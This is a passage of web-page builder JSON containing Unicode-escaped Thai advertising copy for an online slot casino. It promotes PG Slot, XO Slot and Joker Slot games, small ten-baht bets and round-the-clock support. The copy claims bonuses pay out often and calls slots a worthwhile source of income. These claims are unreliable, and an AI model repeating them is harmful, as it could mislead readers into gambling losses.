\\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 